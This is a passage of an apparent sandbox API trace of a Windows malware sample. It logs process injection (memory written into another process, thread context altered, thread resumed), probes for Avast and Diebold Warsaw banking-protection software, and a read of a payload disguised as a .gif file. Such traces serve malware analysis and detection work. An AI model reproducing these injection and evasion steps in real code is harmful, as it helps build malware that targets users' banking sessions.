[69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0086.388] ReadProcessMemory (in: hProcess=0xe8, lpBaseAddress=0x7ffdf008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0086.388] VirtualAllocEx (hProcess=0xe8, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0086.388] VirtualAlloc (lpAddress=0x17f4000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x17f4000
[0086.395] WriteProcessMemory (in: hProcess=0xe8, lpBaseAddress=0x400000, lpBuffer=0x17f020c*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x17f020c*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0086.408] WriteProcessMemory (in: hProcess=0xe8, lpBaseAddress=0x7ffdf008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0086.408] SetThreadContext (hThread=0xe4, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14fe98, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0086.409] ResumeThread (hThread=0xe4) returned 0x1
[0086.500] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0086.500] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.500] GlobalUnlock (hMem=0x95000c) returned 0
[0086.500] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0086.500] GlobalUnlock (hMem=0x950004) returned 0
[0086.509] Sleep (dwMilliseconds=0xe74e)
[0096.745] VirtualFree (lpAddress=0x1854000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0096.745] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0096.745] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0096.745] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0096.745] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0096.745] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0
[0096.746] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0096.746] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0096.746] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0096.746] SetFilePointer (in: hFile=0xf0, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0096.748] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0096.748] ReadFile (in: hFile=0xf0, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0096.755] CloseHandle (hObject=0xf0) returned 1
[0096.756] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.757] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.757] GlobalUnlock (hMem=0x95000c) returned 0
[0096.757] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0096.757] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.758] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.758] GlobalUnlock (hMem=0x95000c) returned 0
[0096.758] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0096.758] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0096.759] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0096.759] GlobalUnlock (hMem=0x95000c) returned 0
[0096.759] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0096.760] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0096.761] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0096.761] GlobalUnlock (hMem=0x95000c) returned 0
[0096.761] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0096.761] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0096.762] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0096.762] GlobalUnlock (hMem=0x95000c) returned 0
[0096.762] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0096.762] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0096.763] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0096.763] GlobalUnlock (hMem=0x95000c) returned 0
[0096.763] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0096.764] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.765] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.765] GlobalUnlock (hMem=0x95000c) returned 0
[0096.765] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0096.766] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.766] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.767] GlobalUnlock (hMem=0x95000c) returned 0
[0096.767] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0096.767] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.767] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.768] GlobalUnlock (hMem=0x95000c) returned 0
[0096.768] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0096.768] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.769] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.769] GlobalUnlock (hMem=0x95000c) returned 0
[0096.769] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0096.769] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.770] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.770] GlobalUnlock (hMem=0x95000c) returned 0
[0096.770] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0096.770] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.771] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.771] GlobalUnlock (hMem=0x95000c) returned 0
[0096.771] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0096.771] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.772] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.772] GlobalUnlock (hMem=0x95000c) returned 0
[0096.772] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0096.772] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.773] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.773] GlobalUnlock (hMem=0x95000c) returned 0
[0096.774] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0096.774] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.775] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.775] GlobalUnlock (hMem=0x95000c) returned 0
[0096.775] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0096.775] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.776] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.776] GlobalUnlock (hMem=0x95000c) returned 0
[0096.776] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0096.778] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0096.778] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0096.779] GlobalUnlock (hMem=0x95000c) returned 0
[0096.779] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0096.779] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0096.779] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0096.779] GlobalUnlock (hMem=0x95000c) returned 0
[0096.780] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0096.782] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0096.783] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0096.783] GlobalUnlock (hMem=0x95000c) returned 0
[0096.783] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0096.783] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.784] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.784] GlobalUnlock (hMem=0x95000c) returned 0
[0096.784] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0096.784] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.785] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.785] GlobalUnlock (hMem=0x95000c) returned 0
[0096.785] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0096.785] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.785] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.785] GlobalUnlock (hMem=0x95000c) returned 0
[0096.786] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0096.786] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.786] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.786] GlobalUnlock (hMem=0x95000c) returned 0
[0096.786] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0096.787] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.787] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.787] GlobalUnlock (hMem=0x95000c) returned 0
[0096.787] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0096.787] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.788] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.788] GlobalUnlock (hMem=0x95000c) returned 0
[0096.788] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0096.788] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.789] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.789] GlobalUnlock (hMem=0x95000c) returned 0
[0096.789] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0096.789] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.790] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.790] GlobalUnlock (hMem=0x95000c) returned 0
[0096.790] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0096.790] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0096.791] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0096.807] GlobalUnlock (hMem=0x95000c) returned 0
